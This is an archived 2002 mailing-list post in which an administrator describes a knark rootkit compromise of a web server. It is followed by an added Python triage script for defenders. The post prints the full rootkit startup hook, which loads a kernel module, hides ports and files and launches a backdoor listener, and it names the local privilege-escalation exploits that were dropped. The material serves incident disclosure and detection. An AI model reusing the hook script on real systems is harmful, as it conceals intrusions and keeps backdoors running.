so, some news ... ok, I found it:

http://rr.sans.org/malicious/ramen3.php -- maybe keep an eye on your systems.

It installed a backdoor on port 2000. It installed several things:

/tmp/xp
/tmp/l

then:

/tmp/.install/
-rw-r--r--   1 www  www  11084 Nov 22 21:04 abc.tgz
drwxr-xr-x   2 www  www   1024 Dec 29 18:15 sploitz/

dir: sploitz
drwxr-xr-x   2 www  www   1024 Dec 29 18:15 ./
d---------   3 www  www   1024 Dec 29 18:17 ../
-rwxr-xr-x   1 www  www  14719 Dec 29 18:15 epc*
-rw-r--r--   1 www  www   4877 May  5  2002 epcs2.c
-rw-r--r--   1 www  www   1270 Feb 27  2002 modu.sh
-rwxr-xr-x   1 www  www  14940 Dec 29 18:14 ptr*
-rw-r--r--   1 www  www   3947 Jun 27  2002 ptrace24.c
-rwxr-xr-x   1 www  www  27710 Dec 29 18:15 su*
-rw-r--r--   1 www  www  11990 May  5  2002 su.c
-rwxr-xr-x   1 www  www  24101 Dec 29 18:15 sxp*
-rw-r--r--   1 www  www   9774 Jun 27  2002 sxp.c

/dev/raw/:
drwxr-xr-x   2 root root   1024 Dec 29 18:17 .doz/

.doz:
-rwxr-xr-x   1 root root  16294 Aug 17  2001 ryan*

/dev/ida/.sys
drwxr-xr-x   3 root root   1024 Dec 29 18:17 ./
drwxr-xr-x   5 root root   1024 Dec 29 20:48 ../
-rwxr-xr-x   1 root root   1250 Mar 30  2001 clean*
-rwxr-xr-x   1 root root  11948 Mar 21  2001 hexa*
drwxr-xr-x   3 root root   1024 Dec 29 18:17 knark/
-rwxr-xr-x   1 root root  15166 Apr 24  2001 knark.tgz*
-rwxr-xr-x   1 root root  10068 Mar  5  2001 slice*
-rwxr-xr-x   1 root root    605 Sep  9  2001 sniffchk*
-rwxr-xr-x   1 root root  17990 Aug 17  2001 snuff*
-rwxr-xr-x   1 root root   5387 Sep  9  2001 snuff.c*
-rwxr-xr-x   1 root root   1990 Oct  5  2001 sysinfo*
-rwxr-xr-x   1 root root   3984 Mar  5  2001 vadim*

then (we have SuSE Linux):

-rw-r--r--   1 root root     28 Dec 29 18:17 /etc/rc.d/rc.sysinit

with the content:

/usr/bin/ishit -t1 -X53 -p

------------------------
In this ishit file is:
--------------
root@WebX(/usr/bin)> more ishit
cd /dev/ida/.sys/knark/ > /dev/null 2> /dev/null
/sbin/insmod -f /lib/modules/atapi.o > /dev/null 2> /dev/null
./nethide ":26BF" > /dev/null 2> /dev/null
./nethide ":23EF" > /dev/null 2> /dev/null
./nethide ":2B18" > /dev/null 2> /dev/null
./nethide ":1A0A" > /dev/null 2> /dev/null
./nethide ":1A0B" > /dev/null 2> /dev/null
./nethide ":1A0C" > /dev/null 2> /dev/null
./nethide ":1A0D" > /dev/null 2> /dev/null
./nethide ":1B58" > /dev/null 2> /dev/null
./nethide ":D5" > /dev/null 2> /dev/null
./nethide ":D9" > /dev/null 2> /dev/null
./nethide ":89" > /dev/null 2> /dev/null
./nethide ":47CB" > /dev/null 2> /dev/null
./nethide ":1A09" > /dev/null 2> /dev/null
./nethide ":1A08" > /dev/null 2> /dev/null
./nethide ":1A07" > /dev/null 2> /dev/null
./nethide ":1A06" > /dev/null 2> /dev/null
./nethide ":1A05" > /dev/null 2> /dev/null
./nethide ":1A04" > /dev/null 2> /dev/null
./nethide ":7DB4" > /dev/null 2> /dev/null
./nethide "7DB4" > /dev/null 2> /dev/null
./hidef /etc/ssh_host_key > /dev/null 2> /dev/null
./hidef /etc/sshd_config > /dev/null 2> /dev/null
./hidef /dev/ida/.sys > /dev/null 2> /dev/null
./hidef /usr/sbin/initd > /dev/null 2> /dev/null
./hidef /dev/raw/.doz > /dev/null 2> /dev/null
./hidef /usr/bin/ishit > /dev/null 2> /dev/null
./hidef /dev/ida/.sys/knark/ * > /dev/null 2> /dev/null
cd ..
/etc/rc.d/init.d/sshd restart > /dev/null 2> /dev/null
/usr/sbin/initd -q -p 32180 > /dev/null 2> /dev/null
# killall -31 initd > /dev/null 2> /dev/null
# /dev/raw/.doz/ryan > /dev/null 2> /dev/null
# killall -31 snuff > /dev/null 2> /dev/null
# killall -31 ryan > /dev/null 2> /dev/null
---------------------- end of ishit file ----------------------

He installs an atapi driver:

root@WebX(/lib/modules)> ll -t
total 17
drwxr-xr-x   4 root root   1024 Dec 29 18:17 ./
-rw-r--r--   1 root root  11796 Dec 29 18:17 atapi.o

and creates an:

root@WebX(/dev)> ll /usr/sbin/initd
-rwxr-xr-x   1 root root 208264 Jan  2  2002 /usr/sbin/initd*

Very nice is:

root@WebX(/usr/bin)> ll ishit
-r-x------   1 root root   2269 Dec 25  2001 ishit*

You cannot delete the file:

root@WebX(/usr/bin)> rm ishit
rm: remove `ishit', overriding mode 0500? yes
rm: ishit: Operation not permitted

So: how to remove that file? It's impossible to overwrite it, or to delete it...

root@WebX(/usr/bin)> lsattr ishit
----i--- ishit
root@WebX(/usr/bin)> chattr -i ishit
root@WebX(/usr/bin)> rm ishit

------

I found an email address in a script that mails a sniffer log to [EMAIL PROTECTED] and starts a new sniffer...

So, I installed http://www.chkrootkit.org/ and checked: 3 machines have stuff installed, and so on...

So, I'm having a great time now... installing new machines...

bye :(

steven

> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Steven Glogger
> Sent: Sunday, 29 December 2002 19:48
> To: [EMAIL PROTECTED]
> Subject: [swinog] hack
>
>
> hi everybody
>
> someone tried to hack our webserver.
> he uploaded a file called 'l' or 'xp' which has a size of: 11947
>
> does anyone know what this could be?
>
> greetings
>
> steven
> ----------------------------------------------
> [EMAIL PROTECTED] Maillist-Archive:
> http://www.mail-archive.com/swinog%40swinog.ch/
> ----------------------------------------------

----------------------------------------------
[EMAIL PROTECTED] Maillist-Archive:
http://www.mail-archive.com/swinog%40swinog.ch/
----------------------------------------------
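Two findings in the post above are worth turning into a repeatable triage check when you are looking at more than one box: the knark `nethide`/`hidef` calls in the startup hook, and the immutable attribute that made `rm` fail until `chattr -i`. The Python below is an added example written for this thread, not the poster's script and not anything shipped with the rootkit. It parses the text of a startup hook and the output of `lsattr`, both constructed here in the shape shown in the post, and reports the hidden ports in decimal, the hidden paths, the module loaded with `insmod`, the listener started with `-p`, and any immutable files. It assumes knark's nethide argument is the hex port string as it appears in /proc/net/tcp (which is what knark's own documentation describes, and it fits the post: the hidden string ":7DB4" is 0x7DB4 = 32180, the same port passed to `initd -p`). Everything else, including the sample inputs, is constructed for the example.

```python
import re

# Constructed sample in the shape of the startup hook quoted in the post
# (a few of the nethide lines, the hidef lines and the initd line are
# reproduced; the rest is omitted to keep the example short).
SAMPLE_HOOK = """\
cd /dev/ida/.sys/knark/ > /dev/null 2> /dev/null
/sbin/insmod -f /lib/modules/atapi.o > /dev/null 2> /dev/null
./nethide ":26BF" > /dev/null 2> /dev/null
./nethide ":7DB4" > /dev/null 2> /dev/null
./nethide "7DB4" > /dev/null 2> /dev/null
./hidef /etc/ssh_host_key > /dev/null 2> /dev/null
./hidef /usr/bin/ishit > /dev/null 2> /dev/null
cd ..
/etc/rc.d/init.d/sshd restart > /dev/null 2> /dev/null
/usr/sbin/initd -q -p 32180 > /dev/null 2> /dev/null
# killall -31 initd > /dev/null 2> /dev/null
"""

# Constructed sample of `lsattr` output (flags field, then path), matching
# the "----i---" the poster saw on the immutable hook file.
SAMPLE_LSATTR = """\
----i--- /usr/bin/ishit
-------- /usr/bin/ls
-------- /usr/sbin/initd
"""

NETHIDE_RE = re.compile(r'^\./nethide\s+"?:?([0-9A-Fa-f]{1,4})"?')
HIDEF_RE = re.compile(r'^\./hidef\s+(\S+)')
INSMOD_RE = re.compile(r'^/sbin/insmod\b.*?(/\S+\.o)')
LISTEN_RE = re.compile(r'^(\S+)\s.*?-p\s+(\d+)')


def parse_hook(text):
    """Extract indicators from a knark-style startup hook.

    nethide is given the hex string /proc/net/tcp prints for a port, so the
    argument is converted to decimal for comparison with netstat output or
    an external port scan. Commented-out lines never executed and are skipped.
    """
    ports, paths, modules, listeners = set(), [], [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        if (m := NETHIDE_RE.match(line)):
            ports.add(int(m.group(1), 16))
        elif (m := HIDEF_RE.match(line)):
            paths.append(m.group(1))
        elif (m := INSMOD_RE.match(line)):
            modules.append(m.group(1))
        elif (m := LISTEN_RE.match(line)):
            listeners.append((m.group(1), int(m.group(2))))
    return {"hidden_ports": sorted(ports), "hidden_paths": paths,
            "modules": modules, "listeners": listeners}


def immutable_files(lsattr_output):
    """Return the paths whose lsattr flag field contains 'i' (immutable).

    Even root cannot unlink or overwrite such a file until the flag is
    cleared with `chattr -i`, which is exactly what the poster ran into.
    """
    found = []
    for line in lsattr_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and 'i' in parts[0]:
            found.append(parts[1])
    return found


def triage(hook_text, lsattr_output):
    """Combine both parsers and flag hidden paths that are also immutable."""
    report = parse_hook(hook_text)
    report["immutable"] = immutable_files(lsattr_output)
    report["hidden_and_immutable"] = sorted(
        set(report["hidden_paths"]) & set(report["immutable"]))
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_HOOK, SAMPLE_LSATTR).items():
        print(f"{key}: {value}")
```

On a live system you would feed `triage()` the contents of the hook file and the output of `lsattr -R` over the directories of interest; the hidden port list is the set to compare against a port scan from another host, since the rootkit module hides those entries from the local /proc/net/tcp.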
